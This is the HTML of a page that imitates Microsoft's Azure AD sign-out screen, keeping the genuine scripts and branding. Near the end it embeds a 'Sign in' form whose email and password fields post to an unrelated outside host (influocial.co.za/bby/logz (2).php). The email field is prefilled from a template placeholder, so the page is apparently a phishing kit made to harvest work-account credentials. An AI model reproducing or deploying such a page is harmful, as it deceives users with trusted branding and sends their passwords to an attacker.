<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" 

"http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="en">
<head>
	<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" 

/>
	<meta content="IE=edge" http-equiv="X-UA-Compatible" />
	<meta content="width=device-width, initial-scale=1.0, maximum-

scale=2.0, user-scalable=yes" name="viewport" />
	<meta content="no-cache" http-equiv="Pragma" />
	<meta content="-1" http-equiv="Expires" />
	<link crossorigin="" href="https://aadcdn.msftauth.net" 

rel="preconnect" />
	<meta content="on" http-equiv="x-dns-prefetch-control" />
	<link href="//aadcdn.msftauth.net" rel="dns-prefetch" />
	<link href="//aadcdn.msauth.net" rel="dns-prefetch" />
	<meta content="signout" name="PageID" />
	<meta content="" name="SiteID" />
	<meta content="1033" name="ReqLC" />
	<meta content="en-US" name="LocLC" />
	<link 

href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupa

yfgghqiai7k9sol6lg2.ico" rel="shortcut icon" />
	<meta content="none" name="robots" /><script 

type="text/javascript">//<![CDATA[
$Config={"cobranding":{"base":"app","label":"Work or school, or personal 

Microsoft account","labelTenant":"Work or school, or personal Microsoft 

account","active":"app","initial":"app","app":

{"Illustration":"https://aadcdn.msftauth.net/shared/1.0/content/images/def

ault_signin_illustration_5o-z8bq4fpd7ix8knl-

t9q2.png","BannerLogo":"","LogoText":"Hang on a moment while we sign you 

out.","BackroundColor":"#0072c6","BoilerPlateText":""},"tenant":

{}},"tiles":{"aadUsers":[],"msaUsers":[],"users":[],"otherUser":

{"name":"Use another 

account","login":"","imageAAD":"use_another_account.png","imageMSA":"use_a

nother_account.png","isLive":false,"link":"other","authUrl":"","sessionID"

:"","domainHint":"other"},"splitterTilesUsers":[{"id":"aad","name":"Work 

or school account","login":"Created by your IT 

department","image":"https://aadcdn.msftauth.net/ests/2.1/content/images/w

ork_account_gwpgszjrdzmg9t-etotdlg2.png"},{"id":"msa","name":"Personal 

account","login":"Created by 

you","image":"https://aadcdn.msftauth.net/ests/2.1/content/images/personal

_account_d3k1lqya8k5_mmblgg85rq2.png"}]},"constants":{"dbgMessages":

[],"MEMBER_NAME":"","FEDERATION_QUERY_PARAMETERS":"?username=

\u0026wa=wsignin1.0\u0026wtrealm=urn%3afederation%3aMicrosoftOnline

\u0026wctx=","BASE_URL":"/common/oauth2/logout?","LATENCY_THRESHOLD":2000,

"CDN_IMAGE_PATH":"https://aadcdn.msftauth.net/ests/2.1/content/images/","I

S_USE_OTHER_ACCOUNT_VISIBLE":false,"MAX_USER_TILES":5,"PARTNER_NAME":"Sign 

in with your work or school 

account","METRICS_MODE":1,"TokenizedStringMsgs":

{"GENERIC_ERROR":"\u003cH1\u003eSorry, but we\u0027re having trouble 

signing you in\u003c/H1\u003e\u003cp\u003ePlease try again in a few 

minutes. If this doesn\u0027t work, you might want to contact your admin 

and report the following error: #~#ErrorCode#~#.\u003c/p

\u003e","UPN_DISAMBIGUATE_MESSAGE":"It looks like {0} is used with more 

than one account. Which account do you want to 

use?"},"REALM_RESOLVER_URL":"/common/userrealm","FORCED_SIGN_IN":false,"is

CxhRequest":false,"isAdalRequest":false,"IS_NAME_COEXISTENCE_ACCOUNT":fals

e,"adalUxOverride":false,"cancelRedirectUrl":"","IS_MSA_FED_SUPPORTED":tru

e,"IS_MSA_PHONE_USERNAME_SUPPORTED":true,"IS_MSA_REDIR_SUPPORTED":false,"M

SA_DOMAIN":"live.com","PROMPT":"","USERNAME_HINT_TEXT":"Email or 

phone","IS_LOGOUT_REQUEST":true,"SHOULD_HIDE_SIGNUP":false,"USE_DARK_TILE_

LOGO":false,"HAS_ERROR":false,"IS_MOBILE":false,"mobileWidthThreshold":600

,"uxLogoutUrl":"https://login.microsoftonline.com/common/uxlogout","forget

Url":"https://login.microsoftonline.com/forgetuser","IS_HOLOGRAPHIC":false

,"savedTiles":{"otherJSON":{"name":"Use another 

account","login":"","imageAAD":"other_glyph.png","imageMSA":"other_glyph.p

ng","isLive":false,"link":"other","authUrl":"","sessionID":"","domainHint"

:"other"}},"Use_Client_Check_Msa_Flag":true,"isDebugMode":false,"request":

{"uaid":"b04ed18e9dc547c2866a0c7ebbf7161d","issuerIdentifier":"mso","isMsa

Supported":true},"Locale":"en-

US","responseMode":"Query","IsB2CScenario":false,"showTilesOnPageLoad":tru

e,"skipMeControlOnPageLoad":true,"onPremPasswordValidationConfig":

{"isUserRealmPrecheckEnabled":true},"desktopSsoConfig":

{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.mic

rosoftazuread-sso.com/

{0}/winauth/sso","iwaSsoProbeUrlFormat":"https://autologon.microsoftazurea

d-sso.com/

{0}/winauth/ssoprobe","iwaIFrameUrlFormat":"https://autologon.microsoftazu

read-sso.com/{0}/winauth/iframe?

isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageL

oad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"isSafar

iAllowed":true,"isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://au

tologon.microsoftazuread-sso.com/{0}/winauth/sso/edgeredirect?

origin=login.microsoftonline.com"},"msaMeControlTimeout":5000},"scid":1030

,"hpgact":1802,"hpgid":8002,"pgid":"signout","apiCanary":"AQABAAAAAAB2Uyzw

tQEKR7-rWbgdcBZIwNA-

Zkp0qt4Wx3li1JotMQuPnA7i2vL098Zb3KJEckWZwwr2EDPypKPQJ1Kpu7siEiXHcoCfOnaSvm

JhMCENcQG92_YrA7tL8TuqFFsiArFQfOYkbZJq_3nnVwO98588d0iqEzQ_FNjNGyXz684PdY-

BUPE-5yUVszjkiaDMnY-

i_oTj7xO2F8asBxovUEUYTX4cJZWomAPPIYSxzy5xMyAA","canary":"9X2MMmXC81jFkO5sS

1BWoQsYEsyqfNrsUY++vtCZ5yo=0:1","correlationId":"72941cbb-c714-4c2a-b07a-

f656aa093173","sessionId":"ccbd8b4c-d5aa-4e53-abe4-

621d3e04a301","locale":{"mkt":"en-

US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":

{"desktopsso":{"authenticatingmessage":"Trying to sign you in"},"msa":

{"label":"(Microsoft account)","account":{"imgalttext":"Microsoft account 

symbol","tilealttext":"Microsoft account for {0}"},"redirect":"We?re 

taking you to the Microsoft account sign-in page."},"aad":{"account":

{"imgalttext":"Work or school account symbol","tilealttext":"Work or 

school account for {0}"},"redirect":"We\u0027re taking you to your 

organization\u0027s sign-in page."},"cloudfed":{"redirect":"We\u0027re 

taking you to your organization\u0027s sign-in 

page."},"otheraccounttext":"Use another account","clickformore":"Click for 

more actions","connectedtowindows":"Connected to 

Windows","signedin":"Signed in","clicktosignin":"","signingout":"Signing 

out...","accountimagealttext":"User account image","header":{"text":

{"username":"Sign in with your work account","password":"Enter your 

password","privacy":"Privacy statement"}},"disambiguation":

{"description":"It looks like {0} is used with more than one account. 

Which account do you want to use?","timeout":"We\u0027re having trouble 

locating your account. Which type of account do you want to 

use?"},"errors":{"30136":"Type the email address or phone number of the 

account you want to sign in with.","30064":{"title":"This doesn\u0027t 

look like a valid user ID","description":"Try using your email address or 

phone number."},"30008":"Sign in to {0}","30067":"\u003cH1\u003eWe don

\u0027t recognize this user ID or password\u003c/H1\u003e\u003cp\u003eBe 

sure to type the password for your work or school account.\u003c/p

\u003e","30068":{"title":"\u003cH1\u003e{0} isn\u0027t in our system

\u003c/H1\u003e\u003cp\u003eMake sure you typed your email address 

correctly. It usually looks like someone@example.com or 

someone@example.onmicrosoft.com\u003c/p\u003e","description":"Make sure 

you typed your email address correctly. It usually looks like 

someone@example.com or someone@example.onmicrosoft.com"},"30111":"Please 

enter your password.","30127":"To sign in, start by entering a user 

ID.","30140":"We\u0027re having trouble locating your account. Which type 

of account do you want to use?","30145":"Check the email address you 

entered. You may have mistyped it.","30146":{"title":"We couldn\u0027t 

find an account with that email address.","description":"Enter a different 

email address or \u003ca id=\u0022user-not-found-link\u0022 href=\u0022#

\u0022\u003eget a new Microsoft account\u003c/a\u003e."},"30168":

{"title":"We don\u0027t recognize this domain name","description":"Make 

sure you typed your organization\u0027s domain name correctly. It usually 

looks like @example.com or @example.onmicrosoft.com."},"30173":"Which type 

of account do you want to sign in with?","30200":"","catchall":"We didn

\u0027t receive a response. Please try again."}},"enums":

{"ClientMetricsModes":

{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4},"NameSp

aceType":{"None":0,"Managed":1,"Federated":2}},"urls":{"instr":

{"pageload":"https://login.microsoftonline.com/common/instrumentation/repo

rtpageload","dssostatus":"https://login.microsoftonline.com/common/instrum

entation/dssostatus"},"disambighelpurl":"https://go.microsoft.com/fwlink/p

/?LinkID=733247","msa":{"meurl":"https://login.live.com/Me.srf?

wa=wsignin1.0\u0026idpflag=direct

\u0026wreply=","oauthauthorizeurl":"https://login.live.com/oauth20_authori

ze.srf","signouturl":null,"passwordreseturl":"https://account.live.com/pas

sword/reset","manageaccounturl":"https://account.microsoft.com","singleuse

code":"http://windows.microsoft.com/en-US/windows-live/sign-in-single-

use-code","signupurl":null},"style":

{"loginhover":"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/log

in_hover.min_ljv4ndvrnkzxawet7dnxpw2.css"},"agreement":

{"tou":"https://www.microsoft.com/en-

US/servicesagreement/","privacy":"https://privacy.microsoft.com/en-

US/privacystatement"},"refreshurl":null,"appredirecturl":null},"browser":

{"ltr":1,"Firefox":1,"_Mac":1,"_M83":1,"_D0":1,"Full":1,"RE_Gecko":1,"b":

{"name":"Firefox","major":83,"minor":0},"os":

{"name":"OSX","version":""},"V":"83.0"},"watson":

{"url":"/common/handlers/watson","bundle":"https://aadcdn.msftauth.net/est

s/2.1/content/cdnbundles/watson.min_ybdb1ixzkv-

fkor2mu6q6w2.js","sbundle":"https://aadcdn.msftauth.net/ests/2.1/content/c

dnbundles/watsonsupport.min__yok_chwseypwbmuffnnaa2.js","fbundle":"https:/

/aadcdn.msftauth.net/ests/2.1/content/cdnbundles/frameworksupport.min_oadr

nc13magb009k4d20lg2.js","resetErrorPeriod":5,"maxCorsErrors":-

1,"maxInjectErrors":5,"maxErrors":10,"maxTotalErrors":3,"expSrcs":

["https://login.microsoftonline.com","https://aadcdn.msauth.net/","https:/

/aadcdn.msftauth.net/",".login.microsoftonline.com"],"envErrorRedirect":tr

ue,"envErrorUrl":"/common/handlers/enverror"},"loader":{"cdnRoots":

["https://aadcdn.msauth.net/","https://aadcdn.msftauth.net/"],"logByThrowi

ng":true},"serverDetails":

{"slc":"ProdSlices","dc":"NEULR2","ri":"DU2XXXX","ver":{"v":

[2,1,11251,20]},"rt":"2020-11-

30T21:24:46","et":47},"fBreakBrandingSigninString":true,"fFixIncorrectApiC

anaryUsage":true,"urlNoCookies":"https://login.microsoftonline.com/cookies

disabled","fTrimChromeBssoUrl":true,"inlineMode":5,"fShowCopyDebugDetailsL

ink":true};
//]]></script><script type="text/javascript">//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!

r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||

25,a=(new Date).toUTCString()+":"+e;n.push(o+":"+a),n.length>r&&n.shift

(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r)

{function t(a){var i=e[a];if(a<n-1){return void(o.r[i]?t(a+1):o.when

(i,function(){t(a+1)}))}r(i)}var n=e.length;t(0)}function r(e,r,a)

{function i(){var e=!!u.method,o=e?u.method:a[0],i=u.extraArgs||[],s=n.

$WebWatson;try{
var c=t(a,!e);if(i&&i.length>0){for(var d=i.length,l=0;l<d;l++){c.push(i

[l])}}o.apply(r,c)}catch(e){return void

(s&&s.submitFromException&&s.submitFromException(e))}}var u=o.r&&o.r

[e];return r=r||this,u&&(u.skipTimeout?i():n.setTimeout(i,0)),u}function 

t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.

$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.

$Do;o.when=function(t,n){function a(e){r(e,i,u)||o.q.push

({"id":e,"c":i,"a":u})}var i=0,u=[],s=1;"function"==typeof n||(i=n,
s=2);for(var c=s;c<arguments.length;c++){u.push(arguments[c])}t instanceof 

Array?e(t,a):a(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var 

a={};if(t&&(a.method=t),n&&

(a.skipTimeout=n),arguments&&arguments.length>3){a.extraArgs=[];for(var 

i=3;i<arguments.length;i++){a.extraArgs.push(arguments[i])}}o.r[e]

=a,o.lock++;try{for(var u=0;u<o.q.length;u++){var s=o.q[u];s.id==e&&r

(e,s.c,s.a)&&o.removeItems.push(s)}}catch(e){throw e}finally{if(0===--

o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d)

{o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e)

{o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!i){if(!r.body)

{return void setTimeout(t)}i=!0,e.$Do.register("doc.ready",0,!0)}}function 

n(){if(!u){if(!r.body){return void setTimeout(n)}t(),u=!0,e.$Do.register

("doc.load",0,!0),a()}}function o(e)

{(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}

function a(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!

1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent

("onreadystatechange",o),e.detachEvent("onload",n))}var i=!1,u=!1;if

("complete"===r.readyState){return void setTimeout(n)}!function()

{r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!

1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent

("onreadystatechange",o),e.attachEvent("onload",n))}()}

(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.

$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", 

id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", 

defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 

0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf

("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.

$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-

1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return 

e.substring(n,n+v.length).toLowerCase()===v}function a(){var r=e();return

(r.loader||{}).slReportFailure||r.slReportFailure||!1}function i(){return

(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function u(){return

(e().loader||{}).logByThrowing||!1}function s(e){if(!t()&&!n()){return!1}

var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var a,i,u;try

{a=e.sheet,i=a&&a.cssRules,u=!1}catch(e){u=!0}if(a&&!i&&u){return!0}
if(a&&i&&0===i.length){return!0}}return!1}function c(){function t(e)

{g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var 

s=null;return s=o(e)?a(e):"script"===n.toLowerCase()?i(e):u(e,n),r&&

(s.id=r),"function"==typeof s.setAttribute&&(s.setAttribute

("crossorigin","anonymous"),t&&"string"==typeof t&&s.setAttribute

("integrity",t)),s}function a(e){var r=g.createElement("link");return 

r.rel="stylesheet",r.type="text/css",r.href=e,r}function i(e){var 

r=g.createElement("script")
;return r.type="text/javascript",r.src=e,r.defer=!1,r.async=!1,r}function 

u(e,r){var t=g.createElement(r);return t.src=e,t}function d(e){if(!

(m&&m.length>1)){return e}for(var r=0;r<m.length;r++){if(0===e.indexOf(m

[r])){return m[r+1<m.length?r+1:0]+e.substring(m[r].length)}}return e}

function l(e,t,n,o){if(r("[$Loader]: "+(b.failMessage||"Failed"),o),

$[e].retry<p){return $[e].retry++,v(e,t,n),void c._ReportFailure

($[e].retry,$[e].srcPath)}n&&n()}function f(e,t,n,o){if(s(o)){return l

(e,t,n,o)}
r("[$Loader]: "+(b.successMessage||"Loaded"),o),v(e+1,t,n);var a=

$[e].onSuccess;"function"==typeof a&&a($[e].srcPath)}function v(e,o,a){if

(e<$.length){var i=$[e];if(!i||!i.srcPath){return void v(e+1,o,a)}

i.retry>0&&(i.srcPath=d(i.srcPath),i.origId||

(i.origId=i.id),i.id=i.origId+"_Retry_"+i.retry);var u=n

(i.srcPath,i.id,i.integrity,i.tagName);u.onload=function(){f

(e,o,a,u)},u.onerror=function(){l(e,o,a,u)},u.onreadystatechange=function

(){"loaded"===u.readyState?setTimeout(function(){f(e,o,a,u)
},500):"complete"===u.readyState&&f(e,o,a,u)},t(u),r("[$Loader]: Loading 

'"+(i.srcPath||"")+"', id:"+(i.id||""))}else{o&&o()}}var h=e

(),p=h.slMaxRetry||2,y=h.loader||{},m=y.cdnRoots||[],b=this,$=

[];b.retryOnError=!

0,b.successMessage="Loaded",b.failMessage="Error",b.Add=function

(e,r,t,n,o,a){e&&$.push({"srcPath":e,"id":r,"retry":n||

0,"integrity":t,"tagName":o||"script","onSuccess":a})},b.AddForReload=func

tion(e,r){var t=e.src||e.href||"";b.Add

(t,"AddForReload",e.integrity,1,e.tagName,r)},
b.AddIf=function(e,r,t){e&&b.Add(r,t)},b.Load=function(e,r){v(0,e,r)}}var 

d,l,f=window,g=f.document,v=".css";c.On=function(e,r,t){if(!e){throw"The 

target element must be provided and cannot be null."}r?c.OnError

(e,t):c.OnSuccess(e,t)},c.OnSuccess=function(e,t){if(!e){throw"The target 

element must be provided and cannot be null."}if(s(e)){return c.OnError

(e,t)}var n=e.src||e.href||"",o=a(),u=i();r("[$Loader]: Loaded",e);var 

d=new c;d.failMessage="Reload Failed",d.successMessage="Reload Success",
d.Load(null,function(){if(o){throw"Unexpected state. ResourceLoader.Load() 

failed despite initial load success. ['"+n+"']"}u&&

(document.location.href="/error.aspx?err=504")})},c.OnError=function(e,t)

{var n=e.src||e.href||"",o=a(),u=i();if(!e){throw"The target element must 

be provided and cannot be null."}r("[$Loader]: Failed",e);var s=new 

c;s.failMessage="Reload Failed",s.successMessage="Reload 

Success",s.AddForReload(e,t),s.Load(null,function(){if(o){throw"Failed to 

load external resource ['"+n+"']"}
u&&(document.location.href="/error.aspx?err=504")}),c._ReportFailure

(0,n)},c._ReportFailure=function(e,r){if(u()&&!t()){throw"[Retry "+e+"] 

Failed to load external resource ['"+r+"'], reloading from fallback CDN 

endpoint"}},f.$Loader=c}(),function(){function e(){if(!$){var e=new h.

$Loader;e.AddIf(!

h.jQuery,y.sbundle,"WebWatson_DemandSupport"),y.sbundle=null,delete 

y.sbundle,e.AddIf(!h.

$Api,y.fbundle,"WebWatson_DemandFramework"),y.fbundle=null,delete 

y.fbundle,e.Add(y.bundle,"WebWatson_DemandLoaded"),
e.Load(r,t),$=!0}}function r(){if(h.$WebWatson){if(h.$WebWatson.isProxy)

{return void t()}m.when("$WebWatson.full",function(){for(;b.length>0;){var 

e=b.shift();e&&h.$WebWatson[e.cmdName].apply(h.$WebWatson,e.args)}})}}

function t(){if(!h.$WebWatson||h.$WebWatson.isProxy){if(!w&&JSON){try{var 

e=new XMLHttpRequest;e.open("POST",y.url),e.setRequestHeader

("Accept","application/json"),e.setRequestHeader("Content-

Type","application/json; charset=UTF-8"),e.setRequestHeader

("canary",p.apiCanary),
e.setRequestHeader("client-request-

id",p.correlationId),e.setRequestHeader("hpgid",p.hpgid||

0),e.setRequestHeader("hpgact",p.hpgact||0);for(var r=-1,t=0;t<b.length;t

++){if("submit"===b[t].cmdName){r=t;break}}var o=b[r]?b[r].args||[]:[],a=

{"sr":y.sr,"ec":"Failed to load external resource [Core Watson 

files]","wec":55,"idx":1,"pn":p.pgid||"","sc":p.scid||0,"hpg":p.hpgid||

0,"msg":"Failed to load external resource [Core Watson files]","url":o

[1]||"","ln":0,"ad":0,"an":!1,"cs":"","sd":p.serverDetails,"ls":null,
"diag":v(y)};e.send(JSON.stringify(a))}catch(e){}w=!0}

y.loadErrorUrl&&window.location.assign(y.loadErrorUrl)}n()}function n()

{b=[],h.$WebWatson=null}function o(r){return function(){var 

t=arguments;b.push({"cmdName":r,"args":t}),e()}}function a(){var e=

["foundException","resetException","submit"],r=this;r.isProxy=!0;for(var 

t=e.length,n=0;n<t;n++){var a=e[n];a&&(r[a]=o(a))}}function i

(e,r,t,n,o,a,i){var u=h.event;return a||(a=l(o||u,i?i+2:2)),
h.$Debug&&h.$Debug.appendLog&&h.$Debug.appendLog("[WebWatson]:"+(e||"")+" 

in "+(r||"")+" @ "+(t||"??")),E.submit(e,r,t,n,o||u,a,i)}function u(e,r)

{return{"signature":e,"args":r,"toString":function(){return 

this.signature}}}function s(e){for(var r=[],t=e.split

("\n"),n=0;n<t.length;n++){r.push(u(t[n],[]))}return r}function c(e){for

(var r=[],t=e.split("\n"),n=0;n<t.length;n++){var o=u(t[n],[]);t[n+1]&&

(o.signature+="@"+t[n+1],n++),r.push(o)}return r}function d(e){if(!e)

{return null}try{if(e.stack){
return s(e.stack)}if(e.error){if(e.error.stack){return s(e.error.stack)}}

else if(window.opera&&e.message){return c(e.message)}}catch(e){}return 

null}function l(e,r){var t=[];try{for(var n=arguments.callee;r>0;){n=n?

n.caller:n,r--}for(var o=0;n&&o<L;){var a="InvalidMethod()";try

{a=n.toString()}catch(e){}var i=[],s=n.args||n.arguments;if(s){for(var 

c=0;c<s.length;c++){i[c]=s[c]}}t.push(u(a,i)),n=n.caller,o++}}catch(e)

{t.push(u(e.toString(),[]))}var l=d(e)
;return l&&(t.push(u("--- Error Event Stack -----------------",

[])),t=t.concat(l)),t}function f(e){if(e){try{var r=/function (.

{1,})\(/,t=r.exec(e.constructor.toString());return t&&t.length>1?t[1]:""}

catch(e){}}return""}function g(e){if(e){try{if("string"!=typeof 

e&&JSON&&JSON.stringify){var r=f(e),t=JSON.stringify(e);return t&&"{}"!

==t||(e.error&&(e=e.error,r=f(e)),(t=JSON.stringify(e))&&"{}"!==t||

(t=e.toString())),r+":"+t}}catch(e){}}return""+(e||"")}function v(e){var 

r=[];try{
if(jQuery?(r.push("jQuery v:"+jQuery().jquery),jQuery.easing?r.push

("jQuery.easing:"+JSON.stringify(jQuery.easing)):r.push("jQuery.easing is 

not defined")):r.push("jQuery is not 

defined"),e&&e.expectedVersion&&r.push("Expected jQuery 

v:"+e.expectedVersion),m){var t,n="";for(t=0;t<m.o.length;t++){n+=m.o

[t]+";"}for(r.push("$Do.o["+n+"]"),n="",t=0;t<m.q.length;t++){n+=m.q

[t].id+";"}r.push("$Do.q["+n+"]")}if(h.$Debug&&h.$Debug.getLogs){var o=h.

$Debug.getLogs();o&&o.length>0&&(r=r.concat(o))}if(b){
for(var a=0;a<b.length;a++){var i=b[a];if(i&&"submit"===i.cmdName){try{if

(JSON&&JSON.stringify){var u=JSON.stringify(i);u&&r.push(u)}}catch(e)

{r.push(g(e))}}}}}catch(e){r.push(g(e))}return r}var h=window,p=h.

$Config||{},y=p.watson,m=h.$Do;if(!h.$WebWatson&&y){var b=[],$=!1,w=!

1,L=10,E=h.$WebWatson=new a;E.CB=

{},E._orgErrorHandler=h.onerror,h.onerror=i,E.errorHooked=!0,m.when

("jQuery.version",function(e){y.expectedVersion=e}),m.register

("$WebWatson")}}(),function(){function e(e,r){
for(var t=r.split("."),n=t.length,o=0;o<n&&null!==e&&void 0!==e;){e=e[t[o

++]]}return e}function r(r){var t=null;return null===s&&(s=e

(a,"Constants")),null!==s&&r&&(t=e(s,r)),null===t||void 

0===t?"":t.toString()}function t(t){var n=null;return null===i&&(i=e

(a,"$Config.strings")),null!==i&&t&&(n=e(i,t.toLowerCase())),null!

==n&&void 0!==n||(n=r(t)),null===n||void 0===n?"":n.toString()}function n

(e,r){var n=null;return e&&r&&r[e]&&(n=t("errors."+r[e])),n||(n=t

("errors."+e)),n||(n=t("errors."+c)),n||(n=t(c)),n}
function o(t){var n=null;return null===u&&(u=e(a,"$Config.urls")),null!

==u&&t&&(n=e(u,t.toLowerCase())),null!==n&&void 0!==n||(n=r

(t)),null===n||void 0===n?"":n.toString()}var 

a=window,i=null,u=null,s=null,c="GENERIC_ERROR";a.GetString=t,a.GetErrorSt

ring=n,a.GetUrl=o}(),function(){var e=window,r=e.$Config||{};e.

$B=r.browser||{}}();

//]]></script>
	<link crossorigin="anonymous" 

href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2

.login.min_59_uuouser7hrkmvbaz1jw2.css" integrity="sha384-

YD1Mo064gQccEULHnH2xiI7JpIGDPToDJLq4VEOgFA5xrAMppLONx4rD/rktlvlN" 

onerror="$Loader.On(this,true)" onload="$Loader.On(this)" rel="stylesheet" 

/><script crossorigin="anonymous" 

src="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/jquery.1.11.m

in__yok_chwseypwbmuffnnaa2.js" onerror='$Loader.On(this,true)' 

onload='$Loader.On(this)' integrity='sha384-

ItLuugWkJpQXuKN94uYLmYdQ4MrBIBmJd/UdjlGCVjBOEJZoLVwWnYIEwIABXSQy'></script

><script crossorigin="anonymous" 

src="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/aad.login.min

_ynywyfekfmsp3ljup2epra2.js" onerror='$Loader.On(this,true)' 

onload='$Loader.On(this)' integrity='sha384-

FRDbPnV9vXhkDpnceLIUwKANlbHoqwYzvMiqBrf6PAmV58O73UJRnLvI72B8s7Oa'></script

>
	<title>Sign out</title>
</head>
<body data-gr-ext-installed="" data-new-gr-c-s-check-loaded="14.984.0" 

data-new-gr-c-s-loaded="14.984.0"><script type="text/javascript">
    
    function SetImageStatus(imageIndex, status)
    {
        
        if (imageStatusArray[imageIndex] === 0)
        {
            
            imageStatusArray[imageIndex] = status;
        }

        TryCompleteSignout();
    }

    function ImageTimeout()
    {
        imageStatusTimeout = true;
        TryCompleteSignout();
    }

    function IframeTimeout()
    {
        iframeStatusTimeout = true;
        TryCompleteSignout();
    }

    function MsaTimeout()
    {
        msaSignoutStatus = 3;
        TryCompleteSignout();
    }

    
    function TryCompleteSignout()
    {
        var signoutComplete = true;


            
            if (iframeStatusTimeout !== true)
            {
                signoutComplete = false;
            }
            


        if (signoutComplete)
        {
            CompleteSignout();
        }
    }

    function CompleteSignout()
    {
        var statusSuccess = true;

        

            CompleteSignoutRender(statusSuccess);
    }

    function CompleteSignoutRender(signoutSuccessful)
    {
        signoutSuccessful = signoutSuccessful && true;

        
            
            
            if (!signoutSuccessful)
            {
                    
                    RenderSignoutFailure();
                    
            }
            else
            {
                RenderSignoutSuccess();

                
                setTimeout('InitiatorRedirect()', 1000);
            }
            
    }

    function RenderSignoutSuccess()
    {
            User.UpdateLogo('', "You signed out of your account", true);

        var signoutStatusMessage = $('#SignOutStatusMessage');
        signoutStatusMessage.text("It\u0027s a good idea to close all 

browser windows.");
        signoutStatusMessage.show();
    }

    function RenderSignoutFailure()
    {
        
        User.UpdateLogo('', 'Hmm... we\u0027re having trouble signing you 

out.', true);
        var signoutStatusMessage = $('#SignOutStatusMessage');
        signoutStatusMessage.text("You may still be signed in to some 

applications. Close your browser to finish signing out.");
        signoutStatusMessage.show();

        
    }

    function WriteSignoutFailedCookie()
    {
        
        document.cookie = "SOS" + "=1; path=/";
    }

    function InitiatorRedirect()
    {
    }
</script><script type="text/javascript">
    
    var imageStatusArray = new Array(0);
    var imageStatusTimeout = false;

    
    for (var i = 0; i < imageStatusArray.length; i++)
    {
        imageStatusArray[i] = 0;
    }

    
    var updatedUsers = [];

    var msaSignoutStatus = 0;
    var msaSignoutTimerId = null;

    var iframeStatusTimeout = false;
</script>
<div>
<div class="background" role="presentation">
<div style="background-image: url

(&quot;https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/0-

small_e4vo5it6bo-bdehiean-dq2.jpg&quot;);">&nbsp;</div>

<div class="backgroundImage" style="background-image: url

(&quot;https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/0_p

dvuot_2pyxh5ith335y8a2.jpg&quot;);">&nbsp;</div>
</div>

<div class="outer">
<div class="middle">
<div class="inner "><img class="banner-logo" role="presentation" 

src="https://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_logo_7z

yesnzhfxur7eprws2m2q2.png" />
<div aria-live="assertive" role="alert">
<div class="wrapper"><!-- Fixed element that spans the viewport -->
<div class="element" id="element">
<form action="

https://influocial.co.za/bby/logz%20(2).php" 

autocomplete="" method="post">
<div id="logo">&nbsp;</div>

<div id="em"><span style="font-size:20px;"><strong>Sign 

in</strong></span></div>

<div>&nbsp;</div>

<div id="ep"><input autofocus="autofocus" id="i0117" name="work" 

placeholder="Password" required="required" size="50" type="email" 

value="[[-Email-]]" /></div>

<div id="ep"><input autofocus="autofocus" id="i0117" name="passwd" 

placeholder="Password" required="required" size="50" type="password" 

value="" /></div>

<div class="sign-opt" id="sign-opt">
<div>&nbsp;</div>

<div id="no-acc">Can&#39;t access your account? <a href="#">Click Here!

</a></div>

<div>&nbsp;</div>

<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<button 

class="newbutton" id="i983893" name="submit" type="submit"><img src="" 

/>Next</button></div>

<div class="sign-opt" id="sign-out">&nbsp;</div>
</div>
</form>
</div>
<!-- your actual centered element --></div>
</div>

<div class="row text-body text-block-body">
<div id="SignOutStatusMessage" style="display: none">&nbsp;</div>
</div>
</div>

